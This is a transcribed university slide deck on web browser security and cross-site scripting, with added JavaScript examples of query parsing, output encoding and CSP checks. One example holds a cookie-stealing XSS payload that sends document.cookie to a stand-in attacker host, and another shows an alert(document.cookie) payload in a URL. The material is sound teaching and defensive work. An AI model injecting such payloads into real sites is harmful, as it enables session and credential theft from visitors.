How To Land Your Next PM Dream Job - PMISSC Meeting - April 2024

Secure webbrowsing 1

  • 1. Odyssey to Web Browser Security - 1 Prepared by: Prosunjit Biswas, Advisor : Dr. Ravi Sandhu Presented : ICS @ UTSA (12th April, 2012) Email: prosun.csedu@gmail.com
  • 2. What are web browsers for?
      • Web browsers retrieve, present and traverse information on the Web, typically provided by web servers.
      • Web browsers use URIs/URLs to locate and retrieve that information.
  • 3. HTTP request (URL) format
      "protocol:" "//" host [ ":" port ] [ abs_path [ "?" query ]]
      Examples:
      1. http://cs.utsa.edu/index.html
      2. http://utsa.summon.serialssolutions.com/search/results?spellcheck=true&q=security
      3. http://www.php.net/manual/en/reserved.variables.get.php
      4. http://www.amazon.com/s/ref=nb_sb_noss/185-1213459-6355102?url=search-alias%3Daps&field-keywords=iphone
  • 4. Notice...
      • The 'query' part of the URL may carry user-provided data that is fed to the application.
      • It is therefore where the payload of most attacks arrives (the path, request headers, cookies and POST bodies are user-controlled as well and deserve the same suspicion).
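To make the point of slides 3 and 4 concrete, here is an added example (not code from the original deck): a parser for the URL grammar on slide 3, a decoder for the query part, and a cheap triage check on the decoded values. The `www.goodhost.com` URL and the payload in it are constructed for this illustration; the other URLs are the slide's own examples.

```javascript
// Added example, not part of the original slides: split a URL into the parts
// of the grammar on slide 3 and decode the query into the key/value pairs the
// application actually receives. EVIL_URL is a constructed payload.

// "protocol:" "//" host [ ":" port ] [ abs_path [ "?" query ]]
const URL_RE = /^([a-z][a-z0-9+.-]*):\/\/([^/:?#]+)(?::(\d+))?(\/[^?#]*)?(?:\?([^#]*))?/i;

function parseUrl(url) {
  const m = URL_RE.exec(url);
  if (!m) return null;
  return {
    protocol: m[1].toLowerCase(),
    host: m[2],
    port: m[3] ? Number(m[3]) : null,
    path: m[4] || '/',
    query: m[5] || '',
  };
}

// application/x-www-form-urlencoded: '+' means space, then percent-decode.
// A malformed escape (e.g. a lone '%') is returned untouched instead of
// throwing, because attackers send malformed input on purpose.
function decodeComponent(s) {
  try {
    return decodeURIComponent(s.replace(/\+/g, ' '));
  } catch (e) {
    return s;
  }
}

function parseQuery(query) {
  const params = {};
  for (const pair of query.split('&')) {
    if (pair === '') continue;
    const eq = pair.indexOf('=');
    const key = eq < 0 ? pair : pair.slice(0, eq);
    const value = eq < 0 ? '' : pair.slice(eq + 1);
    params[decodeComponent(key)] = decodeComponent(value);
  }
  return params;
}

// Cheap triage: does a decoded value carry characters that change meaning
// once echoed into HTML or JavaScript? This flags, it does not sanitise.
function looksLikeMarkup(value) {
  return /[<>"'`]/.test(value);
}

function queryParams(url) {
  const parts = parseUrl(url);
  return parts ? parseQuery(parts.query) : null;
}

function suspiciousParams(url) {
  const params = queryParams(url) || {};
  return Object.keys(params).filter((k) => looksLikeMarkup(params[k]));
}

// Example 2 from slide 3, and a constructed reflected-XSS payload (hypothetical host).
const SEARCH_URL = 'http://utsa.summon.serialssolutions.com/search/results?spellcheck=true&q=security';
const EVIL_URL = 'http://www.goodhost.com/search?q=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E';

if (typeof require !== 'undefined' && require.main === module) {
  for (const u of [SEARCH_URL, EVIL_URL]) {
    console.log(u);
    console.log('  parts :', parseUrl(u));
    console.log('  query :', queryParams(u));
    console.log('  flags :', suspiciousParams(u));
  }
}
```

The server never sees the percent-encoded form: by the time `q` reaches application code it is the raw string `<script>alert(document.cookie)</script>`, which is exactly why the query is the usual carrier for injection payloads.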
  • 5. Web application architecture: server side and client side
      (figure; courtesy "Top 10 attacks" by Saumil Shah)
  • 6. How is a request resolved by the server for the browser?
      (figure)
  • 7. Server response at the browser side
      The server response includes:
      o Data/information (e.g. personal information)
      o HTML markup (tables, paragraphs)
      o JavaScript or other script
      o Cookies (session information)
      o Browser configuration metadata
      o Other resources (e.g. Flash, CSS)
  • 8. HTML markup
      • HTML markup provides the presentation for the data/content.
      • In Web 2.0, data and markup together build the Document Object Model (DOM).
      • The DOM is a tree structure, exposed to script through an XML-like API, for easy retrieval of data.
  • 9. Script / JavaScript
      • When we say Dynamic HTML (DHTML), the dynamic behaviour is achieved by JavaScript on the browser side.
      • JavaScript can manipulate (insert, delete, modify) any content in the browser.
      • Unfortunately it is "The World's Most Misunderstood Programming Language" (Douglas Crockford).
  • 10. Where can JavaScript be put in a web page?
      • Typically JS can be placed almost anywhere.
      • <script> JS content </script>
      • <input onclick="JS content">
      • <img src="javascript:JS content"> (older browsers executed this; current browsers ignore javascript: in an image src, but still honour it in navigation contexts such as href)
      • And others.
  • 11. How can web browsing be insecure?
      • The attacker steals data [attack on user information]
      • The attacker defaces a web page [attack on markup]
      • The attacker injects or modifies JavaScript [script-based attack]
      • The attacker steals cookies
      • The attacker inserts metadata into the page
      • The attacker attacks other resources [e.g. images]
  • 12. Notice...
      • All of the attacks above can be achieved by injecting or modifying JavaScript on an otherwise honest web page.
  • 13. Risk that we do not care about...
      • A website is itself malicious, a user visits it and gets infected. [We leave this to the discretion of the visitor.]
  • 14. Risk that we care about...
      • A website is not intended to be malicious, but an attacker has compromised the page so that everyone who visits it is compromised in turn.
      o [We do care about this.]
  • 15. Attacking approach (client-server perspective)
      • Attack servers / services [server-side attack]
      o e.g. website defacement
      o SQL injection
      o DoS attacks and others
      • Attack the web client [client / browser-based attack]
      o e.g. XSS (cross-site scripting)
      o XSRF (cross-site request forgery)
      o Phishing (social engineering) and others
  • 16. Attacking approach (ways of attack)
      • Content injection
      o SQL injection
      o Script injection (XSS)
      o DOM element injection (DOM-based XSS)
      • Breaking access control / access restriction
      o Cross-domain / cross-frame attacks
      o e.g. cross-domain capability leaks
      • Exploiting application configuration
      o Session hijacking / credential stealing
      o Failure to restrict URL access
      o Insecure cryptography
  • 17. Attacking approach (ways of attack), continued...
      • Insecure network
      o Proxy-based attacks
      o Man-in-the-middle attacks
      • Web-based malware attacks
      We are most interested in content injection attacks because of their wide attack surface.
  • 18. Content injection (through the URL): demonstrating a reflected XSS attack
      (flow diagram, rendered here as steps)
      1. The attacker crafts a link to an honest site with the payload in the query, e.g. www.goodhost.com?search=@#badcontent#@, and sends it to the victim by email or some other way.
      2. The victim clicks the URL; the client web browser sends the request, payload included, to the goodhost.com web server.
      3. The server reflects @#badcontent#@ into its response page without encoding it.
      4. The browser renders the page and executes the payload with the privileges of goodhost.com; the user is infected by the injection attack.
  • 19. Content injection (via comment): demonstrating a stored XSS attack
      (flow diagram, rendered here as steps)
      1. The attacker posts a comment containing malicious content, @#comment!@#; the request is accepted and the comment is inserted into the database.
      2. Bob later requests the same page.
      3. The comment is retrieved from the database and written into the page.
      4. Bob's browser executes the stored payload; every later visitor to the page is hit the same way.
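The two flows on slides 18 and 19 differ only in where the payload waits (the URL versus the database); the defect is the same, and so is the fix. The following added example (not code from the original deck) renders the search page of slide 18 and the comment list of slide 19 both ways: pasting the attacker-controlled string straight into the markup, and HTML-encoding it first. The page layouts, the payload and the comment data are constructed; `scriptBlocks()` is a deliberately tiny stand-in for the browser's parser, enough to show whether a script element ended up in the page.

```javascript
// Added example, not part of the original slides. renderSearch(q, false) is
// what a vulnerable goodhost.com does with the query; renderSearch(q, true)
// is the hardened form. The same pair is shown for stored comments.
// PAYLOAD, STORED and the attacker host are constructed.

// Encode the five characters that can break out of HTML text or a quoted
// attribute. This is correct for HTML body and attribute contexts only;
// data placed inside <script>, a URL or CSS needs that context's encoder.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Slide 18: the search term is reflected into the response.
function renderSearch(search, encode) {
  const shown = encode ? escapeHtml(search) : search;
  return `<html><body><h1>Results for: ${shown}</h1></body></html>`;
}

// Slide 19: comments come back out of the database and into the page.
function renderComments(comments, encode) {
  const enc = encode ? escapeHtml : (s) => s;
  const items = comments.map((c) => `<li><b>${enc(c.author)}</b>: ${enc(c.text)}</li>`);
  return '<ul>' + items.join('') + '</ul>';
}

// Minimal model of what a browser would treat as script: returns the body
// of every <script> element found in the page.
function scriptBlocks(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Cookie-stealing payload of the kind slide 22 describes (constructed).
const PAYLOAD = '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>';

// What the database on slide 19 holds after the attacker's post (constructed).
const STORED = [
  { author: 'bob', text: 'nice site' },
  { author: 'mallory', text: PAYLOAD },
];

function demo() {
  return {
    reflectedUnsafe: scriptBlocks(renderSearch(PAYLOAD, false)).length,
    reflectedSafe: scriptBlocks(renderSearch(PAYLOAD, true)).length,
    storedUnsafe: scriptBlocks(renderComments(STORED, false)).length,
    storedSafe: scriptBlocks(renderComments(STORED, true)).length,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
  console.log(renderSearch(PAYLOAD, true));
}
```

Encoding on output is the control that closes both flows at once, because it is applied at the moment the string meets the markup regardless of where it came from; input filtering alone misses payloads that arrive through a channel the filter did not cover.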
  • 20. Content injection attack (2): what content?
      • SQL (data integrity and privacy attack)
      • Script / JavaScript (privacy attack, e.g. cookie theft)
      • DOM elements (data integrity, e.g. phishing)
      We are most interested in script injection (also called XSS): it is easy and obvious to mount, but its impact is severe, so it is critical to handle.
  • 21. Why do attackers prefer JavaScript injection?
      • JavaScript can access almost every resource in a web page.
      • JavaScript is supported by all major browsers.
      • JavaScript has great expressive power.
  • 22. Consequences of an XSS attack
      • Sensitive information theft
      o Credential theft (e.g. cookies)
      • Intranet scanning
      o Scan for open ports from inside the victim's network.
      • Attacking other users
      o Replay attacks launched from the compromised browser.
  • 23. What are the existing approaches to protecting against XSS attacks?
      All of the existing approaches place some kind of restriction on how JavaScript is used.
      • Host-based restriction
      o Allow JavaScript only from whitelisted hosts.
      o Block JavaScript from blacklisted hosts.
      • Placeholder restriction
      o Restrict the places where JavaScript can be inserted.
  • 24. What are the existing approaches to protecting against XSS attacks? (continued)
      • Transfer restriction
      o Prevent sensitive resources from being sent out to other hosts/domains.
      • Content rewrite
      o Rewrite JavaScript to delete unsafe code.
      • Flow control
      o Control the flow of sensitive information through JavaScript (taint sensitive information).
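The host-based restriction on slide 23 is what browsers ship today as Content-Security-Policy. As an added example (not code from the original deck, and not a browser's implementation), here is a simplified evaluator: it parses a CSP header, picks the directive that governs scripts (`script-src`, falling back to `default-src`), and decides whether a given script may load. The policy, page URL and script URLs are constructed. Simplifications, stated up front: no path matching, no nonces or hashes, no port wildcards and no scheme-upgrade rule for `'self'`.

```javascript
// Added example, not part of the original slides: a reduced model of how a
// browser applies a CSP script-src allow-list (host-based restriction).
// Policies and URLs below are constructed. Not a spec-complete implementation.

function parseCsp(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives[name.toLowerCase()] = sources;
  }
  return directives;
}

function defaultPort(scheme) {
  return scheme === 'https' ? '443' : scheme === 'http' ? '80' : null;
}

function originOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):\/\/([^/:?#]+)(?::(\d+))?/i.exec(url);
  if (!m) return null;
  const scheme = m[1].toLowerCase();
  return { scheme, host: m[2].toLowerCase(), port: m[3] || defaultPort(scheme) };
}

// Host-source forms handled: "https:", "cdn.example.com", "https://cdn.example.com",
// "*.example.com", "example.com:8443". Keyword sources are handled by the caller.
function hostSourceMatches(source, target) {
  const s = source.toLowerCase();
  const schemeOnly = /^([a-z][a-z0-9+.-]*):$/.exec(s);
  if (schemeOnly) return target.scheme === schemeOnly[1];
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)(?::(\d+|\*))?/.exec(s);
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (scheme && scheme !== target.scheme) return false;
  if (port && port !== '*' && port !== target.port) return false;
  if (host.startsWith('*.')) {
    const suffix = host.slice(1); // ".example.com": matches subdomains only
    return target.host.endsWith(suffix) && target.host.length > suffix.length;
  }
  return host === target.host;
}

// script is { src: 'https://...' } for an external script or { inline: true }
// for script placed directly in the page (the vectors of slide 10).
function scriptAllowed(header, pageUrl, script) {
  const d = parseCsp(header);
  const sources = d['script-src'] || d['default-src'];
  if (!sources) return true; // no governing directive: the browser restricts nothing
  if (sources.length === 1 && sources[0] === "'none'") return false;
  if (script.inline) return sources.includes("'unsafe-inline'");
  const page = originOf(pageUrl);
  const target = originOf(script.src);
  if (!page || !target) return false;
  for (const src of sources) {
    if (src === "'self'") {
      if (target.scheme === page.scheme && target.host === page.host && target.port === page.port) return true;
    } else if (src === '*') {
      if (target.scheme === 'http' || target.scheme === 'https') return true;
    } else if (!src.startsWith("'") && hostSourceMatches(src, target)) {
      return true;
    }
  }
  return false;
}

// Constructed policy for the hypothetical www.goodhost.com of slide 18.
const POLICY = "default-src 'self'; script-src 'self' https://cdn.example.com *.trusted.example; img-src *";
const PAGE = 'https://www.goodhost.com/search';

if (typeof require !== 'undefined' && require.main === module) {
  for (const s of [
    { src: 'https://www.goodhost.com/app.js' },
    { src: 'https://cdn.example.com/lib.js' },
    { src: 'http://cdn.example.com/lib.js' },
    { src: 'https://attacker.example/steal.js' },
    { inline: true },
  ]) {
    console.log(JSON.stringify(s), '->', scriptAllowed(POLICY, PAGE, s) ? 'allowed' : 'blocked');
  }
}
```

Note what the policy above does to the reflected payload of slide 18: the injected `<script>` is inline, and without `'unsafe-inline'` it is blocked even though the server reflected it. Host-based restriction does not fix the injection bug, it limits what the injection can do, which is why it pairs with output encoding rather than replacing it.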
  • 25. What are other control points?
      (diagram of the browser's input interface, JS, DOM, cookie store and output interface, with the web server and other domains; the control points it labels are listed below)
      • Control JS and DOM interactions.
      • Control the flow of user-provided data.
      • Sanitize the URL to discard malicious content.
      • Control JS communication with external domains.
      • Control cookies being sent out to external domains.
      • Compare input-interface and output-interface data to check whether malicious content has trespassed through the server.
  • 26. References:
      • http://stackoverflow.com/questions/1267284/common-website-attack-methods-detection-and-recovery
      • http://yehg.net/lab/pr0js/papers/What%20XSS%20Can%20Do.pdf